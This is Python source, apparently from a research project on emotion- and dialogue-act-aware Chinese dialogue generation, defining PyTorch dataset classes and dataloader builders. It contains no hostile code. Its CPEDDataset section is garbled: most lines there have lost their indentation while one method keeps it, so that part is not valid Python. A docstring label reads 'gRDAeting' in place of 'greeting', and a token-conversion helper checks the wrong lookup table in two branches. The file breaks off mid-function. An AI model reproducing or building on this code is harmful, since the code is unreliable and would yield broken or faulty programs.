                              collate_fn=valid_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.valid_batch_size,
                              shuffle=False)
    return train_loader, valid_loader, train_sampler, valid_sampler
def build_edadial_dataloaders(args, tokenizer, logger, load_test=False):
    """Construct EDADIALDataset dataloaders.

    With ``load_test=False`` returns ``(train_loader, valid_loader,
    train_sampler, valid_sampler)``; with ``load_test=True`` returns
    ``(test_loader, test_sampler)``.  Distributed samplers are used when
    ``args.distributed`` is set.
    """
    def _dataset(frame):
        # Every split shares the same dataset configuration.
        return EDADIALDataset(data=frame,
                              tokenizer=tokenizer,
                              emotion_type=args.emotion_type,
                              max_history=args.max_history,
                              batch_first=True,
                              lm_labels=True,
                              with_emotion=args.with_emotion,
                              with_da=args.with_da)

    def _sampler(dataset):
        return torch.utils.data.distributed.DistributedSampler(dataset) if args.distributed else None

    if load_test:
        logger.info("Build test dataloaders")
        test_data, test_samples = get_data(args, tokenizer, args.test_path, logger)
        test_dataset = _dataset(test_data)
        test_sampler = _sampler(test_dataset)
        test_loader = DataLoader(test_dataset,
                                 sampler=test_sampler,
                                 collate_fn=test_dataset.collate,
                                 num_workers=args.num_workers,
                                 batch_size=args.test_batch_size,
                                 shuffle=False)
        return test_loader, test_sampler

    logger.info("Build train and validation dataloaders")
    train_data, train_samples = get_data(args, tokenizer, args.train_path, logger)
    valid_data, valid_samples = get_data(args, tokenizer, args.valid_path, logger)
    train_dataset = _dataset(train_data)
    valid_dataset = _dataset(valid_data)
    train_sampler = _sampler(train_dataset)
    valid_sampler = _sampler(valid_dataset)
    # Shuffling is delegated to the DistributedSampler when distributed.
    train_loader = DataLoader(train_dataset,
                              sampler=train_sampler,
                              collate_fn=train_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.train_batch_size,
                              shuffle=(not args.distributed))
    valid_loader = DataLoader(valid_dataset,
                              sampler=valid_sampler,
                              collate_fn=valid_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.valid_batch_size,
                              shuffle=False)
    return train_loader, valid_loader, train_sampler, valid_sampler
def build_edasdial_dataloaders(args, tokenizer, logger, load_test=False):
    """Construct EDASDIALDataset dataloaders.

    With ``load_test=False`` returns ``(train_loader, valid_loader,
    train_sampler, valid_sampler)``; with ``load_test=True`` returns
    ``(test_loader, test_sampler)``.  Distributed samplers are used when
    ``args.distributed`` is set.
    """
    def _dataset(frame):
        # Every split shares the same dataset configuration.
        return EDASDIALDataset(data=frame,
                               tokenizer=tokenizer,
                               emotion_type=args.emotion_type,
                               max_history=args.max_history,
                               batch_first=True,
                               lm_labels=True,
                               with_emotion=args.with_emotion,
                               with_da=args.with_da)

    def _sampler(dataset):
        return torch.utils.data.distributed.DistributedSampler(dataset) if args.distributed else None

    if load_test:
        logger.info("Build test dataloaders")
        test_data, test_samples = get_data(args, tokenizer, args.test_path, logger)
        test_dataset = _dataset(test_data)
        test_sampler = _sampler(test_dataset)
        test_loader = DataLoader(test_dataset,
                                 sampler=test_sampler,
                                 collate_fn=test_dataset.collate,
                                 num_workers=args.num_workers,
                                 batch_size=args.test_batch_size,
                                 shuffle=False)
        return test_loader, test_sampler

    logger.info("Build train and validation dataloaders")
    train_data, train_samples = get_data(args, tokenizer, args.train_path, logger)
    valid_data, valid_samples = get_data(args, tokenizer, args.valid_path, logger)
    train_dataset = _dataset(train_data)
    valid_dataset = _dataset(valid_data)
    train_sampler = _sampler(train_dataset)
    valid_sampler = _sampler(valid_dataset)
    # Shuffling is delegated to the DistributedSampler when distributed.
    train_loader = DataLoader(train_dataset,
                              sampler=train_sampler,
                              collate_fn=train_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.train_batch_size,
                              shuffle=(not args.distributed))
    valid_loader = DataLoader(valid_dataset,
                              sampler=valid_sampler,
                              collate_fn=valid_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.valid_batch_size,
                              shuffle=False)
    return train_loader, valid_loader, train_sampler, valid_sampler
class REDIALDataset(Dataset):
    '''Dialogue dataset that conditions generation on the responder's emotion.

    Unlike the token-level emotion/DA variants, this dataset exposes only the
    *current* (responder's) speaker id and a single emotion id per sample.

    Example layout:
    word_tokens:    [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
    emotion_list:   [[neutral], [neutral], [neutral]]
    da_list:        [[greeting], [greeting], [greeting]]
    input_ids:      [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
    if with_emotion==True:
        token_type_ids: [ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
    elif with_da==True:
        token_type_ids: [ 0, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088] # "[greeting]": 13088
    else:
        token_type_ids: [ 0, 13086, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
    labels:
    '''
    def __init__(self,
                 data,
                 tokenizer,
                 emotion_type="Sentiment",
                 max_history=15,
                 batch_first=True,
                 lm_labels=True,
                 with_emotion=False,
                 with_da=False):
        # data: DataFrame with at least Dialogue_ID / Speaker / Token /
        # <emotion_type> columns (pandas-style boolean indexing is used below).
        self.data = data
        self.tokenizer = tokenizer
        self.emotion_type = emotion_type # "Sentiment" or "BaseEmotion" or "Emotion"
        self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
        self.with_da=with_da # Whether use DA to help generate dialogue
        self.max_history = max_history # Maximum number of dialogue sentences
        self.pad = tokenizer.pad_token_id
        self.batch_first = batch_first
        self.lm_labels = lm_labels
        # One sample per unique dialogue id.
        self.keys = list(set(self.data['Dialogue_ID']))
        self.len = len(self.keys)
    def __len__(self):
        # Number of distinct dialogues.
        return self.len
    def __getitem__(self, index):
        # Build one sample: history + current speaker + current emotion id.
        dialogue_id = self.keys[index]
        data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
        if self.lm_labels: # for train and valid dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            current_speaker = speaker_list[-1]
            # NOTE(review): EMOTION_TO_ID is used regardless of
            # self.emotion_type — confirm Sentiment/BaseEmotion labels are
            # valid keys of EMOTION_TO_ID, otherwise this raises KeyError.
            current_emotion_id = EMOTION_TO_ID[data_index[self.emotion_type].tolist()[-1]]
            response = data_index["Token"].tolist()[-1]
        else: # for test dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            current_speaker = speaker_list[-1]
            current_emotion_id = EMOTION_TO_ID[data_index[self.emotion_type].tolist()[-1]]
            response = []
        return self.process(speaker_list, utterance_history, current_speaker, current_emotion_id, response)
    def create_speaker(self,speaker_list):
        # First turn's speaker becomes "[speaker1]"; everyone else "[speaker2]".
        speaker1 = speaker_list[0]
        new_speaker_list = []
        for speaker in speaker_list:
            if speaker==speaker1:
                new_speaker_list.append("[speaker1]")
            else:
                new_speaker_list.append("[speaker2]")
        return new_speaker_list
    def process(self, speaker_list, history, current_speaker, current_emotion_id, response, with_eos=True):
        """Build the instance dict: input_ids, token_type_ids,
        current_speaker_id, current_emotion_id, lm_labels (only the
        response segment is unmasked)."""
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        instance = {}
        # sequence = [[bos], turn_1, ..., response(+eos)], each turn prefixed
        # with its speaker token.
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
        instance["current_emotion_id"] = current_emotion_id
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            # Unmask only the response tokens (skip its speaker prefix).
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def testdata_process(self, speaker_list, history, current_speaker, current_emotion_id, response, with_eos=True):
        # NOTE(review): byte-identical to process() and never called by
        # __getitem__ — appears to be dead code; confirm before removing.
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        instance = {}
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
        instance["current_emotion_id"] = current_emotion_id
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def collate(self, batch):
        """Pad per-instance fields into batch tensors; returns
        (input_ids, token_type_ids, current_speaker_id, current_emotion_id,
        labels)."""
        input_ids = pad_sequence(
            [torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=self.pad)
        token_type_ids = pad_sequence(
            [torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=self.pad)
        # NOTE(review): torch.tensor over a list of 0-d tensors works but is
        # slow; a plain list of ints would suffice here — confirm and simplify.
        current_speaker_id = torch.tensor(
            [torch.tensor(instance["current_speaker_id"], dtype=torch.long) for instance in batch],
            dtype=torch.long)
        current_emotion_id = torch.tensor(
            [torch.tensor(instance["current_emotion_id"], dtype=torch.long) for instance in batch],
            dtype=torch.long)
        labels = pad_sequence(
            [torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=-1)
        return input_ids, token_type_ids, current_speaker_id, current_emotion_id, labels
def build_redial_dataloaders(args, tokenizer, logger, load_test=False):
    """Construct REDIALDataset dataloaders.

    With ``load_test=False`` returns ``(train_loader, valid_loader,
    train_sampler, valid_sampler)``; with ``load_test=True`` returns
    ``(test_loader, test_sampler)``.  Distributed samplers are used when
    ``args.distributed`` is set.
    """
    def _dataset(frame):
        # Every split shares the same dataset configuration.
        return REDIALDataset(data=frame,
                             tokenizer=tokenizer,
                             emotion_type=args.emotion_type,
                             max_history=args.max_history,
                             batch_first=True,
                             lm_labels=True,
                             with_emotion=args.with_emotion,
                             with_da=args.with_da)

    def _sampler(dataset):
        return torch.utils.data.distributed.DistributedSampler(dataset) if args.distributed else None

    if load_test:
        logger.info("Build test dataloaders")
        test_data, test_samples = get_data(args, tokenizer, args.test_path, logger)
        test_dataset = _dataset(test_data)
        test_sampler = _sampler(test_dataset)
        test_loader = DataLoader(test_dataset,
                                 sampler=test_sampler,
                                 collate_fn=test_dataset.collate,
                                 num_workers=args.num_workers,
                                 batch_size=args.test_batch_size,
                                 shuffle=False)
        return test_loader, test_sampler

    logger.info("Build train and validation dataloaders")
    train_data, train_samples = get_data(args, tokenizer, args.train_path, logger)
    valid_data, valid_samples = get_data(args, tokenizer, args.valid_path, logger)
    train_dataset = _dataset(train_data)
    valid_dataset = _dataset(valid_data)
    train_sampler = _sampler(train_dataset)
    valid_sampler = _sampler(valid_dataset)
    # Shuffling is delegated to the DistributedSampler when distributed.
    train_loader = DataLoader(train_dataset,
                              sampler=train_sampler,
                              collate_fn=train_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.train_batch_size,
                              shuffle=(not args.distributed))
    valid_loader = DataLoader(valid_dataset,
                              sampler=valid_sampler,
                              collate_fn=valid_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.valid_batch_size,
                              shuffle=False)
    return train_loader, valid_loader, train_sampler, valid_sampler
class RDADIALDataset(Dataset):
    '''Dialogue dataset that conditions generation on the responder's dialogue act.

    Mirror of REDIALDataset but with a single DA id per sample instead of an
    emotion id.

    Example layout:
    word_tokens:    [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
    emotion_list:   [[neutral], [neutral], [neutral]]
    da_list:        [[greeting], [greeting], [greeting]]
    input_ids:      [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
    if with_emotion==True:
        token_type_ids: [ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
    elif with_da==True:
        token_type_ids: [ 0, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088] # "[greeting]": 13088
    else:
        token_type_ids: [ 0, 13086, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
    labels:
    '''
    def __init__(self,
                 data,
                 tokenizer,
                 da_type="DA", # name of the column holding the DA labels
                 max_history=15,
                 batch_first=True,
                 lm_labels=True,
                 with_emotion=False,
                 with_da=False):
        self.data = data
        self.tokenizer = tokenizer
        self.da_type = da_type # "DA": DA label column name
        # NOTE(review): with_emotion/with_da are stored but never read by
        # this class's methods — confirm whether external code uses them.
        self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
        self.with_da=with_da # Whether use DA to help generate dialogue
        self.max_history = max_history # Maximum number of dialogue sentences
        self.pad = tokenizer.pad_token_id
        self.batch_first = batch_first
        self.lm_labels = lm_labels
        # One sample per unique dialogue id.
        self.keys = list(set(self.data['Dialogue_ID']))
        self.len = len(self.keys)
    def __len__(self):
        # Number of distinct dialogues.
        return self.len
    def __getitem__(self, index):
        # Build one sample: history + current speaker + current DA id.
        dialogue_id = self.keys[index]
        data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
        if self.lm_labels: # for train and valid dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            current_speaker = speaker_list[-1]
            current_da_id = DA_TO_ID[data_index[self.da_type].tolist()[-1]]
            response = data_index["Token"].tolist()[-1]
        else: # for test dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            current_speaker = speaker_list[-1]
            current_da_id = DA_TO_ID[data_index[self.da_type].tolist()[-1]]
            response = []
        return self.process(speaker_list, utterance_history, current_speaker, current_da_id, response)
    def create_speaker(self,speaker_list):
        # First turn's speaker becomes "[speaker1]"; everyone else "[speaker2]".
        speaker1 = speaker_list[0]
        new_speaker_list = []
        for speaker in speaker_list:
            if speaker==speaker1:
                new_speaker_list.append("[speaker1]")
            else:
                new_speaker_list.append("[speaker2]")
        return new_speaker_list
    def process(self, speaker_list, history, current_speaker, current_da_id, response, with_eos=True):
        """Build the instance dict: input_ids, token_type_ids,
        current_speaker_id, current_da_id, lm_labels (only the response
        segment is unmasked)."""
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        instance = {}
        # sequence = [[bos], turn_1, ..., response(+eos)], each turn prefixed
        # with its speaker token.
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
        instance["current_da_id"] = current_da_id
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            # Unmask only the response tokens (skip its speaker prefix).
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def testdata_process(self, speaker_list, history, current_speaker, current_da_id, response, with_eos=True):
        # NOTE(review): byte-identical to process() and never called by
        # __getitem__ — appears to be dead code; confirm before removing.
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        instance = {}
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
        instance["current_da_id"] = current_da_id
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def collate(self, batch):
        """Pad per-instance fields into batch tensors; returns
        (input_ids, token_type_ids, current_speaker_id, current_da_id,
        labels)."""
        input_ids = pad_sequence(
            [torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=self.pad)
        token_type_ids = pad_sequence(
            [torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=self.pad)
        # NOTE(review): torch.tensor over a list of 0-d tensors works but is
        # slow; a plain list of ints would suffice here — confirm and simplify.
        current_speaker_id = torch.tensor(
            [torch.tensor(instance["current_speaker_id"], dtype=torch.long) for instance in batch],
            dtype=torch.long)
        current_da_id = torch.tensor(
            [torch.tensor(instance["current_da_id"], dtype=torch.long) for instance in batch],
            dtype=torch.long)
        labels = pad_sequence(
            [torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=-1)
        return input_ids, token_type_ids, current_speaker_id, current_da_id, labels
class CPEDDataset(Dataset):
'''
word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
emotion_list: [[neutral], [neutral], [neutral]]
da_list: [[gRDAeting], [gRDAeting], [gRDAeting]]
input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
if with_emotion==True:
token_type_ids: [ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
elif with_da==True:
token_type_ids: [ 0, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088] # "[gRDAeting]": 13088
else:
token_type_ids: [ 0, 13086, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
labels:
'''
def __init__(self,
data,
tokenizer,
emotion_type="Sentiment", # 读取DA数据
da_type="DA",
persona_type=["Gender","Neuroticism","Extraversion","Openness","Agreeableness","Conscientiousness"],
max_history=15,
batch_first=True,
lm_labels=True,
with_current_speaker=False,
with_current_persona=False,
with_current_emotion=False,
with_current_da=False,
with_emotion=False,
with_da=False):
self.data = data
self.tokenizer = tokenizer
self.emotion_type = emotion_type # 'Emotion' 情感标签列名
self.da_type = da_type # 'DA' DA标签列名
self.persona_type = persona_type
self.with_current_speaker = with_current_speaker
self.with_current_persona = with_current_persona
self.with_current_emotion = with_current_emotion
self.with_current_da = with_current_da
self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
self.with_da=with_da # Whether use DA to help generate dialogue
self.max_history = max_history # Maximum number of dialogue sentences
self.pad = tokenizer.pad_token_id
self.batch_first = batch_first
self.lm_labels = lm_labels
self.keys = list(set(self.data['Dialogue_ID']))
self.len = len(self.keys)
def __len__(self):
return self.len
def __getitem__(self, index):
dialogue_id = self.keys[index]
data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
if self.lm_labels: # for train and valid dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
if self.with_emotion:
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
else:
emotion_list = []
if self.with_da:
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
else:
da_list = []
current_speaker = speaker_list[-1]
current_emotion_id = EMOTION_TO_ID[data_index[self.emotion_type].tolist()[-1]]
current_da_id = DA_TO_ID[data_index[self.da_type].tolist()[-1]]
if self.with_current_persona:
current_gender_id = GENDER_TO_ID[data_index[self.persona_type[0]].tolist()[-1]]
current_Neuroticism_id = BIGFIVE_TO_ID[data_index[self.persona_type[1]].tolist()[-1]]
current_Extraversion_id = BIGFIVE_TO_ID[data_index[self.persona_type[2]].tolist()[-1]]
current_Openness_id = BIGFIVE_TO_ID[data_index[self.persona_type[3]].tolist()[-1]]
current_Agreeableness_id = BIGFIVE_TO_ID[data_index[self.persona_type[4]].tolist()[-1]]
current_Conscientiousness_id = BIGFIVE_TO_ID[data_index[self.persona_type[5]].tolist()[-1]]
current_persona_ids = [current_gender_id,current_Neuroticism_id,current_Extraversion_id,current_Openness_id,
current_Agreeableness_id,current_Conscientiousness_id]
else:
current_persona_ids = []
response = data_index["Token"].tolist()[-1]
else: # for test dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
if self.with_emotion:
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
else:
emotion_list = []
if self.with_da:
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
else:
da_list = []
current_speaker = speaker_list[-1]
current_emotion_id = EMOTION_TO_ID[data_index[self.emotion_type].tolist()[-1]]
current_da_id = DA_TO_ID[data_index[self.da_type].tolist()[-1]]
if self.with_current_persona:
current_gender_id = GENDER_TO_ID[data_index[self.persona_type[0]].tolist()[-1]]
current_Neuroticism_id = BIGFIVE_TO_ID[data_index[self.persona_type[1]].tolist()[-1]]
current_Extraversion_id = BIGFIVE_TO_ID[data_index[self.persona_type[2]].tolist()[-1]]
current_Openness_id = BIGFIVE_TO_ID[data_index[self.persona_type[3]].tolist()[-1]]
current_Agreeableness_id = BIGFIVE_TO_ID[data_index[self.persona_type[4]].tolist()[-1]]
current_Conscientiousness_id = BIGFIVE_TO_ID[data_index[self.persona_type[5]].tolist()[-1]]
current_persona_ids = [current_gender_id,current_Neuroticism_id,current_Extraversion_id,current_Openness_id,
current_Agreeableness_id,current_Conscientiousness_id]
else:
current_persona_ids = []
response = []
return self.process(speaker_list,
utterance_history,
emotion_list,
da_list,
current_speaker,
current_emotion_id,
current_da_id,
current_persona_ids,
response)
def create_speaker(self,speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def convert_EMOTION_TO_TOKENS(self,emotion_list):
emotion_tokens_list = []
if self.emotion_type=="Sentiment": # "Sentiment"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
elif self.emotion_type=="BaseEmotion": # "BaseEmotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
else: # "Emotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
return emotion_tokens_list
def convert_DA_TO_TOKENS(self,da_list):
da_tokens_list = []
for da in da_list:
da_tokens_list.append(DA_TO_TOKENS[da])
return da_tokens_list
def set_da_in_speaker(self,da_ids,input_ids,bos, eos, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_da_ids = []
for i,da in enumerate(da_ids):
if input_ids[i] in special_token_ids_list:
new_da_ids.append(da_ids[i])
else:
new_da_ids.append(self.pad)
return new_da_ids
def set_emotion_in_speaker(self,emotion_ids,input_ids,bos, eos, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_emotion_ids = []
for i,emotion in enumerate(emotion_ids):
if input_ids[i] in special_token_ids_list:
new_emotion_ids.append(emotion_ids[i])
else:
new_emotion_ids.append(self.pad)
return new_emotion_ids
    def process(self,
                speaker_list,
                history,
                emotion_list,
                da_list,
                current_speaker,
                current_emotion_id,
                current_da_id,
                current_persona_ids,
                response,
                with_eos=True):
        """Assemble one training instance from a dialogue.

        Concatenates ``[bos]`` + each history utterance (each prefixed with
        its speaker token) + the response (optionally terminated with eos),
        and builds the aligned token-type / emotion / DA id sequences.
        Only the response tokens are supervised in ``lm_labels``; everything
        else is masked with -1.

        NOTE(review): assumes ``speaker_list``, ``emotion_list`` and
        ``da_list`` each have one entry per segment after the leading bos
        (i.e. len(history) + 1) — verify against callers.
        """
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        instance = {}
        # Segment layout: [[bos]] + history utterances + [response (+ eos)].
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        # Prefix every segment after the leading [bos] with its speaker id.
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        # token_type_ids: bos for the first position, then each segment's
        # speaker id repeated over every token of that segment.
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        if self.with_da:
            # DA id broadcast over every token of its segment.
            instance["da_ids"] = [bos] + [da_list[i] for i, s in
                                          enumerate(sequence[1:])
                                          for _ in s]
        if self.with_emotion:
            # Emotion id broadcast over every token of its segment.
            instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
                                               enumerate(sequence[1:])
                                               for _ in s]
        if self.with_current_speaker:
            instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
        if self.with_current_emotion:
            instance["current_emotion_id"] = current_emotion_id
        if self.with_current_da:
            instance["current_da_id"] = current_da_id
        if self.with_current_persona:
            instance["current_persona_ids"] = current_persona_ids
        # Default: nothing is predicted (-1 everywhere). When lm_labels is
        # enabled, supervise only the response tokens; the extra [-1] masks
        # the response segment's speaker-token prefix (sequence[-1][0]).
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
def testdata_process(self,
speaker_list,
history,
emotion_list,
da_list,
current_speaker,
current_emotion_id,
current_da_id,
current_persona_ids,
response,
with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_da:
instance["da_ids"] = [bos] + [da_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_emotion:
instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_current_speaker:
instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
if self.with_current_emotion:
instance["current_emotion_id"] = current_emotion_id
if self.with_current_da:
instance["current_da_id"] = current_da_id
if self.with_current_persona:
instance["current_persona_ids"] = current_persona_ids
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def collate(self, batch):
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
token_type_ids = pad_sequence(
[torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
if self.with_emotion:
emotion_ids = pad_sequence(
[torch.tensor(instance["emotion_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
emotion_ids = None
if self.with_da:
da_ids = pad_sequence(
[torch.tensor(instance["da_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
da_ids = None
if self.with_current_speaker:
current_speaker_id = torch.tensor(
[torch.tensor(instance["current_speaker_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
else:
current_speaker_id = None
if self.with_current_persona:
current_persona_ids = pad_sequence(
[torch.tensor(instance["current_persona_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=1) # padding_value=1 means unknown here
else:
current_persona_ids = None
if self.with_current_emotion:
current_emotion_id = torch.tensor(
[torch.tensor(instance["current_emotion_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
